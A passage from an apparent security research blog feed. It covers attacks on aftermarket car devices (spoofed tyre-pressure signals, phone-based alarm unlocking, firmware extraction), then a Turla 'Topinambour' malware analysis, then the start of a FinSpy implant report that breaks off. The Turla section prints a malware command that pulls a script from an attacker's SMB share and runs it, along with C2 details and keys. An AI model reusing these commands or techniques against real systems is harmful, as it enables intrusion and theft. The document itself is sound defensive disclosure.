The system ran for ten minutes in that mode, then started to signal an absence of communication with the pressure sensors. We decided to point our receiver to the required frequency.

Nothing. Neither sensors, nor the system itself showed any sign of activity. There could be three reasons: the sensors were not charged, the system was based on a gyroscope and the sensors only worked when the wheels were spinning, or the sensors were activated when the pressure inside was higher than the ambient pressure. To find out the exact reason, we needed to tinker with the sensors.

The third reason turned out to be the real one: we used a syringe to create a higher pressure in the sensors, and they showed signs of activity.

The intercepted signals provided the specific frequency the system ran on. Using that, we recorded the signals with a receiver. Sensors analyze tire pressure and temperature, encode that information into bytes and transmit it via the modulator in the form of radio signals. We analyzed these via a special program that normally shows recorded signals. What we did was basically grab grabbed the modulated signals and decode those back into bytes.

Here it is. When zoomed, the visual recording looks very much like Frequency Shift Keying (FSK) modulation (a digital modulation technique where the frequency of the carrier signal varies according to digital signal changes):

This stage allowed us to recognize the transmitted bits, as bottom and top strokes are basically “1” or “0”, indicating presence or absence of signal. Thus, the recorded visual signal can be presented in the form of bits as follows:

0101010101010101010101010101011010011001011001100101010101011010100110100110010110101010011010100110100101011001011001011010100101010101011001010110101010010110

Now, we need to find out the parameters of signal transmission. The program shows that the symbol rate is 19400 Bd.:

We assumed that the system is using Manchester code, as it is the most widespread one. It is basically an agreement on how to digitally encode radio signal, a line code in which the encoding of each data bit is either low, then high—or high, then low.

There are two encoding conventions: when 0 is expressed through a low-to-high transition and 1 is expressed through a high-to-low transition (Thomas convention), and when the reverse is true (IEEE 802.3 convention). We manipulated the syringe to create a higher pressure in the sensors for further analysis. For our own convenience, we shifted the recorded data into a hexadecimal positional numeral system. The signals looked as follows:

00 01 A5 03 B4 F7 62 4E 04 79
FF FE 5A FC 4B 08 9D B1 FB 86

The seventh, eighth and tenth bytes, marked in red, showed changes when sensors were pressed. For a sanity check, we converted some of the bytes into the decimal system, but the figures turned out to be too big to represent a level of pressure.

The system manual indicated that the maximum permissible pressure was 6 bars. The average syringe produces approximately 2.2 bars. Our further calculations have revealed that the seventh byte (62) stands for around 2.254 in the Thomas convention. This was very close, so we concluded that the seventh byte was responsible for pressure data. This also allowed us to identify out the convention used in the system encoding.

After collecting more and more signal, we revealed a number of regularities in the recording that led us to the following informed guess on what each byte stands for.

00 Preamble 01 A5 Synchronization byte 03 Sensors serial number B4 F7 62 Pressure 4E ??? 04 ??? 79 Checksum

We were able to notice that the eighth byte changed rarely and by a very small value. Since we were testing the sensor inside a room with a stable temperature, it was reasonable to guess what that byte stood for. As we now knew the encoding logic, we could try to test that hypothesis. According to the system manual, the operating temperature was between -40 and +125 degrees Celsius.

However, we assumed that the system used the Kelvin scale, so we decided to shift our metric to Kelvins since it does not use “0”. Our calculations showed that the eighth byte (4E) stood for 37 degrees Celsius which seemed quite credible. Thus, we had now identified three meaningful byte columns: tire pressure, temperature and serial number.

With all that in mind, we prepared four packages of byte data and set up the transmitter:

The red column, for instance, stands for 2 bars of pressure and the blue one, for 24 degrees Celsius. And it worked! We could now proceed to hacking the system. For the second iteration, we changed the values in one of the columns to simulate the temperature of the rear right wheel.

That worked as well: the control unit indicated an overheating of one hundred degrees Celsius!

So, what can a hacker use all of that for?

First of all, for a successful attack, he needs to know the unique serial number of each wheel. He can obtain that information the same way we did: from the transmitted signal. So, the hacker can simply approach the targeted vehicle with a receiver, press repeatedly on the tires and then decode the signal. After that, he should be able to send fake packages of data. But this would be a difficult task: the hacker would need to transmit a signal from the car with a constantly directed antenna to the victim’s car while driving, as once the signal was lost, the receiver in the car would immediately accept the signal from the original sensors and stop signaling problems.

Therefore, while our research indicated that there was indeed a way to mess with the system we purchased, the simulated attack is too resource-intensive. It is much cheaper and easier to use a different way of forcing the owner to leave the car:

Overall, one can call the device vulnerable due to the possibility of intercepting and decoding its radio signal. However, the functionality of this device is so limited that its owners can rest easy.

Another dongle: does the wire count?

As said above, there are a lot of devices that can talk with a vehicle’s smart components via an OBD2 connector. While the wireless connections have proven to have insecurities, we have also decided to examine their wired peers for diversity reasons. The device we purchased turned out to be an error code reader.

It also connected to the car by means of an OBD that included multiple physical channels for communication with the vehicle’s internals. However, in reality, an error code reader only need to support one channel, which is a CAN bus. Even though in our case this interface was used only for error code reading, its actual functionality depended on vehicle design and could be much broader, including even the vehicle’s Electronic Control Units (ECUs) firmware update.

We decided to take a closer look at our reader and analyze how it can communicate with the vehicle.

Our device’s communication scheme is rather simple. In addition to OBD, it has only one USB interface, which is used for firmware upgrades and communication with a PC.

The vendor put a lot of effort into protecting the firmware against analysis. To start with, files with the latest firmware cannot be downloaded from the Internet via a direct link. The firmware upgrade process is performed by means of a special software utility.

We did not find anything that resembled firmware in the software distribution, so we made the assumption that the firmware had to be somehow downloaded from the Internet. We analyzed the network traffic that was sent by the software during the firmware update process and found out that the firmware was transferred via regular HTTP requests. That means that it is possible to download the latest firmware from a web browser by copying the request used by the utility. Once downloaded, the firmware was sent to the device via a proprietary protocol implemented over the USB connection. We investigated the protocol and determined the format of all commands used for writing code or data to a specific address. We also wrote a script capable of communicating with the device via the protocol.

And here comes the second protection measure employed by the vendor: encryption. The firmware consists of two parts, stored in two separate files, and both of those are encrypted. This structure is due to the device hardware design.

The major components of the device are a microcontroller, equipped with a relatively small amount of internal flash memory for firmware storage, and a separate external flash chip for storing bigger amounts of requisite data. The two firmware files contain data for the external and internal flash storage, respectively.

As we were unable to analyze the firmware downloaded from the Internet, we tried to download it directly from the device after an update in hope that it was stored in an unencrypted form. We failed with the firmware part that was stored in the internal flash, as the microcontroller had its debug interface blocked, and it was not possible to access the internal flash memory.

However, we did partially succeed as we were able to dump an image of the external flash. The image contained only the device’s configuration and no code, but all data on the flash chip were stored in the unencrypted form. We assumed that, as the device decrypted external flash data during the firmware update, it could also decrypt the internal flash data. And both the decryption algorithm and key could be the same for both firmware parts. We tried to write the internal part of the firmware to the external flash, and as our assumption proved correct, as we found the decrypted code in the external flash afterwards.

We found that the internal flash was only partially written to during the firmware update. Some of the code remained the same, at least during an update to the firmware version we were analyzing. However, there was still a possibility to investigate all the code included in the firmware update package.

Thus, we were able to get our hands on the decrypted part of the firmware and to write it down to the external chip with the help of a pre-written script that implemented the vendor’s software protocol. Theoretically, this could give us a way to tamper with the device by adding arbitrary code to the chip through physical access via the USB protocol.

The latter could allow us to reprogram the device, forcing it to write down all parts of its firmware to the external chip. With a complete image available, we would be able to search for various vulnerabilities. The problem is that the device has so little memory that it would not be able to perform anything but error reading and logging.

So, the situation here is clear, just like with mobile phones and smartphones: fewer capabilities and simpler connectivity means fewer insecurities. However, vendors are still better off encrypting all crucial parts of their data, such as firmware—even if their product is wired.

Smart alarm systems for cars: mobility as insecurity

Another device came from a well-known Russian vendor that produces automotive security systems. This particular device that we examined was a car security system capable of controlling opening of the doors and starting of the engine. Obviously, an attacker assuming control over the system would put a big question mark over the car’s future. Interestingly enough, the vendor guarantees that it is impossible to hijack the car with the system installed. Let us see whether that is a valid statement.

The system is basically a control unit installed inside the car, in a special hard-to-reach section. This is normally done in auto repair shops. Once installed, the system is then paired with the owner’s smartphone. Initial analysis showed that there were three ways to control the system:

  • With keychains, of which the package includes two: a simple one that can open the door and trunk and an advanced one with a display that shows status information;
  • Discreetly, via a paired smartphone;
  • Via Bluetooth, from an Android-powered smartphone.

The keychains interact with the alarm system at a frequency of 868 megahertz. It is not possible to intercept anything because the information is encrypted, and we would only see a useless set of data, which could take years to decrypt. We believe it is unlikely that a malicious user would go for it. Our search in the Darknet was also of no help, as we were unable to find an implemented hack for this vector. Therefore, the manufacturer has implemented an excellent product within the first attack vector.

The other way to attack the system was by infecting the original paired phone. We decided to test this scenario.

When started, the application requests neither a login, nor a password. The interaction between the mobile phone and the security system takes place directly, without any unlocking pattern. This is very bad news: if a hacker steals an unlocked phone, he can then steal the car as well, simply by commanding it to open a door. But we decided to go further.

There are many ways to attack an Android phone and then interfere with its functioning. We decided to try the Android Accessibility service vector. This is a service for people with disabilities that allows managing of all other installed applications, for instance, voice management over the phone’s keyboard.

Using this service, we were able to find the required component in the security application: the “Open Door” button with ACTION_CLICK. However, we could not tap it, as the application is designed to be unresponsive to short taps. In order to unlock the doors, one would need to press and hold the button for a few seconds. The pressure on the button is processed by a special algorithm, and of course, there is no API that would allow us to adjust the time of a virtual press in Android. Thus, we were forced to look for other ways of press the button.

…And we found it! The application successfully responded to left and right swipes on the button. We wrote a small program that moved a virtual finger over the button for two seconds, unlocking the security system. After many attempts, we finally did it.

After that, we went for a Bluetooth connection, which also looked promising. The system interacted via Bluetooth Low Energy (BLE), so we had state-of-the-art technology on our hands. However, there was a flipside to the coin, as the hacker community had been working on a means of intercepting BLE data for a couple of years.

With that in mind, we prepared a booth using a laptop with a BLE interface and acquired another USB BLE adapter: we needed two interfaces to successfully implement a man-in-the-middle attack. For the attack, we tried to scan the targeted device, the alarm system, to get the required data and create a copy of that in one of the BLE interfaces of the laptop. Being a BLE system, the alarm transmitted relatively infrequently. This is done in order to optimize battery power usage, which comes in handy when you are the driver. We could thus generate signals from its fake copy more frequently, prompting the phone to connect it instead of the original. If we were successful, one BLE interface of our MITM station would communicate with the security system on behalf of the phone, while the second interface on the laptop would communicate with the original authorized phone. We would thus intercept the traffic and even be able to generate more, for example, to command the system to open the door.

So, we had a working alarm system broadcasting via BLE and paired with the original smartphone, and an MITM station. Now we needed to create a fake copy of the system and force the phone to connect to it. While scanning, our MITM booth was supposed to detect the security system when we set the correct MAC address of the original phone’s Bluetooth interface. And this was when we suffered a complete failure. The system utterly refused to give us the information required for creating a fake copy. We changed MAC addresses and the interface—nothing worked: the system kept connecting only to the phone with which it was originally paired.

As it turned out, the system could be paired with only one particular phone, and the communication channel between the alarm system and phone was encrypted. It also appeared that to establish communication between the phone and the system itself, the user would need to switch the system into programming mode. After that, the system would wait for a connection request form the phone. The pairing procedure was performed in a tricky way: as we said above, it is done via service stations. The control unit was hidden inside the car and accompanied with a unique PIN for activating it. The pairing process itself is further encrypted: the system and the phone exchange encryption keys, establishing a secure communication session, after which the system refuses to communicate with any other phone other than the one originally authorized.

Thus, one cannot simply connect to the system from a random device—that is what we call “built with security in mind”. Therefore, the manufacturer has implemented an excellent product within the second attack vector as well.

Considering all the above, the scenario of a successful attack would be as follows. First, the cybercriminal would need the driver’s phone number. There are multiple ways to get that: for instance, many drivers in Russia leave their cellphone number right behind the windshield for emergency contact. This is followed by the stage of phone infection, for instance via a targeted attack. If successful, the victim’s phone is infected with a Trojan that has the permission to use accessibility services. This would allow to track the victim down and to command applications on their phone to open the car doors. Even though the Bluetooth range is not large, it is theoretically possible for a hacker to discreetly open the door and start the engine while the victim is somewhere near their car.

So, the main result of this research is simple: the biggest security issue here is the smartphone, which can be attacked in numerous ways. One could steal it while unlocked and command it to open the door via the original application that does not require a password. Alternatively, one could build an application that would command the system to open the door or target the original applications that are vulnerable to almost any existing attack scenario, including attacks via Android Accessibility service. One could also infect the phone via SMS or malicious spam, or by posting a trojanized application on Google Play. After that, the trojan can simply hide and wait for the right situation to discreetly unlock the phone, launch the application and command it to open the door. The hacker just needs to be somewhere around the car and the victim’s infected mobile phone. While the Bluetooth range is not large enough for performing all the steps needed for hijacking the car, opened doors seem to be a danger worth paying attention to. However, this security issue is not the alarm system vendor’s responsibility.

What can be done to fix that? Well, first of all, it is not a good idea to manage this type of security systems via a phone. But even if that is the case, it is truly necessary for vendors to implement unlocking patterns for alarm security applications, just like with banking apps. Overall, it is difficult to counteract attacks on Android smartphones, but the hacker’s task can be greatly complicated. For example, for accessibility services, that could be done through obfuscation of application component titles. It is also reasonable to add user authorization by template. None of these measures will stop attackers but will make their lives much harder. As for users, we urge everyone to be cautious when it comes to mobile security. And do not forget about mobile security solutions.

GPS tracker for cars: is the Big Brother watching you?

Another device we checked was a compact GPS tracker for cars with water protection and a magnetic mount. It assumes a wide range of usage scenarios: from controlling employees’ movements in their personal vehicles to tracking the delivery of parcels and cargo, and protection of rental equipment.

The default kit includes a SIM card with a special plan attached to it. However, you can use your own SIM, too. The main thing here is to have GPRS and SMS support. The latter duplicates a GPRS channel for situations when there is no GPRS signal, or to cut roaming costs.

GPS coordinates, accelerometer and other sensor data are transmitted via the GSM/GPRS channel to the provider’s servers. Whilst there is not a lot we can do with the tracker itself, there is plenty of room for malicious activity on the server side of the system. We decided to assess the possibility of a potential attack on the trackers’ web services. The motivation for the hacker here is simple: given access to the corporate account, a malevolent competition agent would be able to track employees’ logistics, account balances or personal data.

Initial analysis has shown that the system utilizes a well-known GPS-monitoring and telematics platform for operation. However, we were unable to identify any vulnerabilities in that.

We then decided to research the service’s official website. We found that it was based on WordPress v4.9.9. There were no publicly reported vulnerabilities linked to that version.

Two website directories have attracted our attention: the administrator sand customer login form. Both could be subjected to a brute-force attack, especially given the fact that the latter does not support two-factor authentication.

Upon successful application of this infection vector to the latter form, the malevolent user could, in theory, access the customer base, which is equivalent to possession of the bulk of private data including, but not limited to, travel patterns, financial data, contacts and names. And in the case of the other form, this would include financial data, transaction history and accounting documents.

Thus, theoretically, and even with limited connectivity, the tracker in question could be successfully exploited due to simple lack of vigilance when securing the web services. However, the possibility of this is so low that there are no real reasons to be worried.

Smart App-Controlled Dashcam: have you put an eye on your car security?

Thanks to modern technology, we can use special dashcams to record what is happening around the car while driving in order to have evidence ready in case of an accident. As with other types of devices, we are seeing more and more “smart” dashcams enter the market, so we decided to analyze one of these to understand which useful features along with potential security risks they have as part of the IoT world.

We selected one of the most popular “smart” dashcams in the market and were initially quite skeptical about the security standard of the device. According to supplied documentation, there were two official applications for both Android and iOS available and a WiFi-interface was used for communication between the device and smartphone or tablet—we had seen plenty of cases when this kind of set up led to disastrous security issues in other IoT-devices.

We will start with initial analysis. The core device functionality includes the following:

  1. Recording wide-angle (130°) 1080 Full HD video while the car ignition is on, with videos stored on a microSD flash memory card and cyclically overwritten. The size of the stored data depends on the card.
  2. Recording emergency videos, with potential emergencies detected by a special G-Sensor. These videos are stored in a separate folder for ease of search and safety against overwriting. A more advanced model of this device can record emergency videos while the car is parked and ignition is off.
  3. Activating night vision mode to adjust the quality of recorded video during nighttime;
  4. Connecting to an Android or iOS device with a special management application installed;
  5. Understanding various user voice commands.

We were pleasantly surprised with the security assessment of both the device and official applications that follows. The main point is that the only option for external intruder to gain control over the device, for example, for the purpose of stealing recorded videos, the scenario where the owner’s smartphone is infected aside, is to connect to the camera’s own WiFi hotspot. After connecting, the attacker can either use one of the official applications to retrieve all the data or connect to the camera server on the local network in order to take advantage of the various hidden features not listed in the applications, for example, to brick the device.

The developers have the WiFi connection process covered. If you want to connect a new device to the camera, you need to both enter the password and push a special button on the camera itself. This makes it impossible to connect to the device without physical access, which would make no sense anyway, because with physical access, you can steal the microSD card with all data on it. In addition, it is possible to change the hotspot password in the application, and the user is offered to change the default password upon establishing the first connection.

To sum it up, we can see that device manufacturers and software developers are starting to pay more attention to security issues as they produce various “smart” IoT devices. If this dashcam is used by a thoughtful individual who will consider changing the default password upon the initial connection, all the data will be invulnerable to external intruders.

Conclusions

So, after all that, the last question we have to ask ourselves is: what did we learn? Perhaps we learnt to keep our small-scale testing going. The main outcomes of our experiment with automotive-related smart or connected devices showed that their security status is more or less adequate, as long as minor issues are ignored. This is partly due to the limited device functionality and a lack of serious consequences in case of a successful attack—but also thanks to the vendors’ vigilance.

Yet, seeing how the industry progresses towards a more connected and smartly bright future, this is no reason to rest easy: the golden rule here is that the smarter the object is, the more consideration must be given to its security at the stage of development and patch management. After all, one unpatched vulnerability or carelessness at one particular stage of product development or in use could result in a victim’s car hijacked or a successful attempt at spying on a car fleet.

Keeping that and the upcoming vacation season in mind, we would like to share the following advice on how to choose IoT devices for your smart car:

  1. When choosing what part of your vehicle you are going to make a little bit smarter, consider the security risks. Think twice if it has something to do with car telemetry or access to its “brain”.
  2. Before buying a device, search the internet for news of any vulnerability. It is likely that the device you are going to purchase has already been examined by security researchers and it is possible to find out whether the issues found in the device have been patched.
  3. It is not always a great idea to buy the most recent products released to the market. Along with the standard bugs you get in new products, recently launched devices might contain security issues that have not yet been discovered by security researchers. The best choice is to buy products that have already received several software updates.
  4. Always consider the security of the “mobile dimension” of the device, especially if you have Android devices—applications are often helpful and make life easier, but once a smartphone is hit by malware, a lot can go wrong.

To overcome challenges of smart device cybersecurity, Kaspersky is investing into Kaspersky OS, widely used in customized manufacturing hardware and software. The system can be used across a variety of fields: on mobile devices and PCs, the Internet of Things, intelligent energy systems, industrial systems, telecommunications, and transportation systems. Kaspersky sees opportunities in the further development of KasperskyOS to meet the needs of our customers and ensure that the highest levels of security can be achieved in all these fields, including automotive industry. More information can be found here.

When it comes to the vendors of IoT devices, the main advice is simple: collaborate with the security vendors and community when developing new devices and improving old ones.

2019. július 15.

Turla renews its arsenal with Topinambour

Turla, also known as Venomous Bear, Waterbug, and Uroboros, is a Russian speaking threat actor known since 2014, but with roots that go back to 2004 and earlier. It is a complex cyberattack platform focused predominantly on diplomatic and government-related targets, particularly in the Middle East, Central and Far East Asia, Europe, North and South America and former Soviet bloc nations.

2019 has seen the Turla actor actively renew its arsenal. Its developers are still using a familiar coding style, but they’re creating new tools. Here we’ll tell you about several of them, namely “Topinambour” (aka Sunchoke – the Jerusalem artichoke) and its related modules. We didn’t choose to name it after a vegetable; the .NET malware developers named it Topinambour themselves.

The new modules were used in an active campaign that started at the beginning of 2019. As usual, the actor targeted governmental entities. The role of the .NET module is to deliver the known KopiLuwak JavaScript Trojan. Moreover, this actor now also has a heavily obfuscated PowerShell Trojan that is similar to KopiLuwak. Among the control servers there are several legitimate but compromised WordPress websites with the actor’s .php scripts on them.

This time, the developers left some Easter eggs for the targets and researchers. The .NET modules include amusing strings such as “TrumpTower” as an initial vector for RC4 encryption. “RocketMan!” (probably a reference to Donald Trump’s nickname for Kim Jong Un) and “MiamiBeach” serve as the first beacon messages from the victim to the control server.

How Topinambour spreads

To deliver all this to targets, the operators use legitimate software installers infected with the Topinambour dropper. These could be tools to circumvent internet censorship, such as “Softether VPN 4.12” and “psiphon3”, or Microsoft Office “activators”.

The dropper contains a tiny .NET shell that will wait for Windows shell commands from the operators. Using this and SMB shares on rented virtual private servers (VPS), the campaign operators spread the next-stage modules using just “net use” and “copy” Windows shell commands. It’s hard to believe, but SMB still works through public networks.

These campaign-related VPSs are located in South Africa. Interestingly, their external IP addresses start with “197.168”. Possibly these first two bytes are there to mimic LAN addresses that start with “192.168”. Lateral movements in the target’s infrastructure show how familiar the campaign operators are with the IPv6 protocol. Along with IPv4 they use the newer version for shell commands and LAN addresses.

What Topinambour wants from the targets

The purpose of all this infrastructure and modules in JavaScript, .NET and PowerShell is to build a “fileless” module chain on the victim’s computer consisting of an initial small runner and several Windows system registry values containing the encrypted remote administration tool. The tool does all that a typical Trojan needs to accomplish: upload, download and execute files, fingerprint target systems. The PowerShell version of the Trojan also has the ability to get screenshots.

Trojan Command set JavaScript exit upld inst wait dwld .NET #down #upload #timeout #stop #sync PowerShell #upload #down #screen #timeout #stop #sync

Even the command system in the different Trojans is quite similar

Interesting technical features

A plausible hypothesis for developing similar malware in different languages could be to avoid detection: if one version is detected on the victim’s computer, the operators can try an analogue in a different language. In the table below, we compare Trojans in terms of encryption keys in use and initial messages to control servers.

Trojan RC4 encryption key Initial beacon to C2 JavaScript KopiLuwak 01a8cbd328df18fd49965d68e2879433 “bYVAoFGJKj7rfs1M” plus hash based upon Windows installation date .NET TrumpTower RocketMan! PowerShell TimesNewRoman MiamiBeach

For some reason, the developers prefer to entertain targets and researchers instead of randomizing strings

Our analysis of the dropper is based on the sample below:

SHA256 8bcf125b442f86d24789b37ce64d125b54668bc4608f49828392b5b66e364284
MD5 110195ff4d7298ba9a186335c55b2d1f
Compiled 2018.09.10 12:08:14 (GMT)
Size 1 159 680
Original name topinambour.exe

The dropper sample on which our analysis is based implements the following features:

Dropper function Features unpack_p Drops payload to %LOCALAPPDATA%/VirtualStore/certcheck.exe. The “p” in the function name and corresponding resource in the dropper stands for “payload” make_some_noise Gains persistence for payload with a scheduled task that starts every 30 minutes unpack_o Drops the original application that the dropper tries to mimic (such as psiphon3) to %TEMP%/activator.exe and runs it. Here “o” in the function name and corresponding resource in the dropper stands for “original”

The Topinambour authors decided to name the remote shell persistence function “make_some_noise()”

Dropped tiny .NET remote shell

The tiny dropped application gets Windows shell commands from the C2 and silently executes them.

The Topinambour tiny .NET shell first tries to get commands from an external IP, which looks like a LAN, and then continues with possibly infected LAN IPs

The first DWORD (four bytes) received after a TCP request to the C2 is the data size for the following communication. Then the data contained in the next packets will be the Windows shell command to silently execute the application using “cmd.exe /c”. And that’s it – straightforward, simple and useful.

KopiLuwak dropper

This is where the notorious KopiLuwak comes into play. The .NET remote shell silently downloads scripts from the C2 – from the opened SMB share on a remote CELL-C VPS in South Africa to be precise. “Net use” and “copy” Windows shell commands are enough to fulfil the task.

cmd.exe /c net use \\197.168.0.247\c$ <user_pass_here> /user:administrator & copy /y \\197.168.0.247\c$\users\public\documents\i.js $documents\j.js & $documents\j.js

As a result, the victim is infected with a KopiLuwak obfuscated JavaScript.

Deobfuscated KopiLuwak dropper that puts the RC4 decryption key into the scheduler task for next-stager persistence

Its functions are described in the table below:

Script function Features Create scheduler task Creates a task with the name ProactiveScan, description “NTFS Volume Health Scan”, which runs C:\Users\<user_name_here>\AppData\Roaming\Microsoft\Chkdsk.js with the parameters “-scan Kdw6gG7cpOSZsBeH”, where the parameter is the RC4 decryption key Fingerprint host Saves a set of commands such as systeminfo, net view, tasklist /v, gpresult /z, dir \x22%programfiles%\x5cKaspersky Lab\x22, tracert www.google.com to
%appdata%\Microsoft\x5ct235.dat Drop next JavaScript Drops C:\Users\<user_name_here>\AppData\Roaming\Microsoft\Chkdsk.js

The dropped “Chkdsk.js” decrypts one more script using the RC4 key provided in the dropper’s scheduled task and runs the decrypted code. This final stager is a more complex Trojan, able to parse and execute custom commands from the C2.

The operators get the victim’s data in XML format: every message has a 16-byte signature at the beginning and a victim-specific fingerprint that the developer calls “ridid”.

Constant Bytes Value and features magic 16 Every encrypted message from the infected host starts with this. In the samples described, the magic bytes are ‘bYVAoFGJKj7rfs1M’. ridid 32 Hash value, based on Windows installation date and the aforementioned 16-byte magic value RC4 iv 32 RC4 initial vector to encrypt communication between the target and the C2. In the samples described, the IV value is “01a8cbd328df18fd49965d68e2879433”

Decrypted and deobfuscated target hashing algorithm, based on Windows installation date and 16-byte hardcoded string

The malware communicates with a legitimate compromised WordPress-based website and gets four byte length commands from URL like “http://<legitimate domain>/wp-includes/Requests/Socks.php”. First, the malware beacons to its C2 and gets the command to execute as an answer.

Command Features exit Send “t235.dat” fingerprinting file content with “upl” text in the XML message, delete the file and stop script execution upld Send “t235.dat” content with “upl” text in XML message. If no such file exists, or it’s empty, it sends “opt file no exists or size limit” text in the XML message inst Command format is:
  • – three bytes after command – overall server response length
  • – three following bytes – they are “jss”
  • – Tail – JavaScript to execute

Send ‘good install’ and “t235.dat” content in the XML messages. Save executed JavaScript file as %APPDATA%\Microsoft\ghke94d.jss wait Do nothing dwld Command format is the same as for the “inst” command, but the script from the server will not be executed at once. It saves the decrypted JavaScript as %APPDATA%\Microsoft\awgh43.js and sends ‘success get_parse_command’ in the XML message KopiLuwak JavaScript

The downloaded script takes a binary from the Windows registry and runs it. The registry subkeys and values vary from target to target.

The slightly obfuscated script used to run the payload from registry

It is not completely clear how the registry keys were created; however, the attackers usually use the .NET initial infector for that. In some samples, there is an additional function to get the victim´s MAC address.

This is the end of first “JavaScript” infection chain. Now, let’s also briefly describe the second .NET-based chain.

.NET RocketMan Trojan

We call this Trojan RocketMan after the string the developer uses for beaconing. Another string inside this malware is “TrumpTower”, used as an RC4 encryption initial vector.

This malware reads the C2 IP and port from the registry where it was saved by the previous stager. It processes the following commands from its C2 that are received encrypted over HTTP:

Command Features #down Make HTTP POST request to http://<config_ip>:<config_port>/file to download the file with the provided name to the victim’s computer #upload Make HTTP GET request to http://<config_ip>:<config_port>/update, decrypt server response and upload the file to the server with the provided path and name #timeout Get the pause length from the server command argument and wait #stop Make HTTP GET request to http://<config_ip>:<config_port>/exit, stop the Trojan operation #sync Send encrypted “RocketMan!” string to the server PowerShell MiamiBeach Trojan

Last but not least, the developers behind the Topinambour campaign also used a PowerShell Trojan. This Trojan contains around 450 strings and uses “TimesNewRoman” as the RC4 initial vector to encrypt C2 communications.

This module beacons to its hardcoded C2 with the string “MiamiBeach” using an HTTP POST. The Trojan is quite similar to the .NET RocketMan Trojan and can handle the same commands; additionally, it includes the “#screen” command to take a screenshot.

Conclusions

The reason behind the development of KopiLuwak’s PowerShell and .NET analogues may be simply to minimize detection of the well-known, publicly discussed JavaScript versions. Using the Windows system registry to store encrypted data that is later used by the malware also seems to be aimed at minimizing detection and reducing the digital footprint on any victim’s computer, where only a tiny starter would be left.

It’s a bit surprising, amusing and not entirely clear why the developers have used some seemingly US-related strings such as “RocketMan!”, “TrumpTower” or “make_some_noise”. They are hardly likely to serve as false flags. The usage of KopiLuwak, a well-known and exclusive artefact previously used by the Turla group, makes us attribute this campaign to this actor with high confidence.

Indicators of compromise C2 HTTP GET templates
  • http://<config_ip>:<config_port>/file
  • http://<config_ip>:<config_port>/update
  • http://<config_ip>:<config_port>/exit
Some campaign-related MD5 hashes
  • 47870ff98164155f088062c95c448783
  • 2c1e73da56f4da619c4c53b521404874
  • 6acf316fed472300fa50db54fa6f3cbc
  • 9573f452004b16eabd20fa65a6c2c1c4
  • 3772a34d1b731697e2879bef54967332
  • d967d96ea5d0962e08844d140c2874e0
  • a80bbd753c07512b31ab04bd5e3324c2
  • 37dc2eb8ee56aeba4dbd4cf46f87ae9a
  • 710f729ab26f058f2dbf08664edb3986
Domains and IPs VPSs used as control servers
  • 197.168.0.73
  • 197.168.0.98
  • 197.168.0.212
  • 197.168.0.243
  • 197.168.0.247
  • 197.168.0.250
2019. július 10.

New FinSpy iOS and Android implants revealed ITW

FinSpy is spyware made by the German company Gamma Group. Through its UK-based subsidiary Gamma International Gamma Group sells FinSpy to government and law enforcement organizations all over the world. FinSpy is used to collect a variety of private user information on various platforms. Its implants for desktop devices were first described in 2011 by Wikileaks and mobile implants were discovered in 2012. Since then Kaspersky has continuously monitored the development of this malware and the emergence of new versions in the wild. According to our telemetry, several dozen unique mobile devices have been infected over the past year, with recent activity recorded in Myanmar in June 2019. Late in 2018, experts at Kaspersky looked at the functionally latest versions of FinSpy implants for iOS and Android, built in mid-2018. Mobile implants for iOS and Android have almost the same functionality. They are capable of collecting personal information such as contacts, SMS/MMS messages, emails, calendars, GPS location, photos, files in memory, phone call recordings and data from the most popular messengers.

Malware features iOS

FinSpy for iOS is able to monitor almost all device activities, including record VoIP calls via external apps such as Skype or WhatsApp. The targeted applications include secure messengers such as Threema, Signal and Telegram. However, functionality is achieved by leveraging Cydia Substrate’s hooking functionality, so this implant can only be installed on jailbroken devices (iPhone or iPad; iPod has not been confirmed) compatible with iOS 11 and below (newer versions are not confirmed as at the time of the research and implants for iOS 12 has not been observed yet). After the deployment process, the implant provides the attacker with almost unlimited monitoring of the device’s activities.

The analyzed implant contained binary files for two different CPU architectures: ARMv7 and ARM64. Taking into account that iOS 11 is the first iOS version that does not support ARMv7 any more, we presumed that the 64-bit version was made to support iOS 11+ targets.

It looks like FinSpy for iOS does not provide infection exploits for its customers, because it seems to be fine-tuned to clean traces of publicly available jailbreaking tools. Therefore, an attacker using the main infection vector will need physical access in order to jailbreak it. For jailbroken devices, there are at least three possible infection vectors:

  • SMS message
  • Email
  • WAP Push

Any of those can be sent from the FinSpy Agent operator’s terminal.

The installation process involves several steps. First, a shell script checks the OS version and executes the corresponding Mach-O binary: “install64” (64-bit version) is used for iOS 11+, otherwise “install7” (32-bit version) is used. When started, the installer binary performs environmental checks, including a Cydia Subtrate availability check; and if it isn’t available, the installer downloads the required packages from the Cydia repository and installs them using the “dpkg” tool. After that the installer does some path preparations and package unpacking, randomly selects names for the framework and the app from a hardcoded list, deploys components on the target system and sets the necessary permissions. After the deployment process is done, the daemon is started and all temporary installation files are deleted.

The persistence of the implant is achieved by adding “plist” with starting instructions to the /Library/LaunchDaemons path.

All sensitive parameters of the configuration (such as C2 server address, C2 telephone numbers and so on) are stored in the file “84C.dat” or in “PkgConf”, located in a bundle path of the main module. They can be rewritten using operator commands. This filename was used in previous FinSpy versions for different platforms, including Android.

The following list describes all the modules of the analyzed FinSpy version:

Name Format Functionality netwd app Framework, launcher of the core module – FilePrep FilePrep app Core module MediaEnhancer dylib Audio recordings .vpext dylib VoIP calls hooking .hdutils dylib Hiding utilities keys dylib Keylogger SBUtils dylib SpringBoardHooker utilities .chext dylib Messenger tracking hdjm unknown Not observed in detected versions, possibly some type of module for hiding traces of a jailbreak

All the internal strings in the modules, including the installer, are encrypted with a simple xor-based algorithm using the following strings as keys: “NSString”, “NSArray”, “NSDictionary”, “ExtAudioFileRef”.

The core implant module (“FilePrep”) contains 7,828 functions. It controls all the others modules, takes care of HTTP and SMS heartbeats and other service functions. Communication between components is implemented in two ways. The first uses the system’s CPDistributedMessagingCenter, the second is a local HTTP server that receives data requests.

The module “.hdutils” is designed to cover up the tracks of the implant activities on the device. First of all, it configures the processing of all incoming SMS messages. It parses the text looking for specific content and will hide notifications for such messages. Then it sends them to the core module via CPDistributedMessagingCenter (a wrapper over the existing messaging facilities in the operating system, which provides server-client communication between different processes using simple messages and dictionaries). Another hiding feature is to hook the “CLCopyAppsUsingLocation” function in order to remove the core implant module from the displayed list of applications used in Settings geolocation services.

The module “.chext” targets messenger applications and hooks their functions to exfiltrate almost all accessible data: message content, photos, geolocation, contacts, group names and so on. The following messenger applications are targeted:

  • Facebook Messenger (com.facebook.Messenger);
  • Wechat (com.tencent.xin);
  • Skype (com.skype.skype/com.skype.SkypeForiPad);
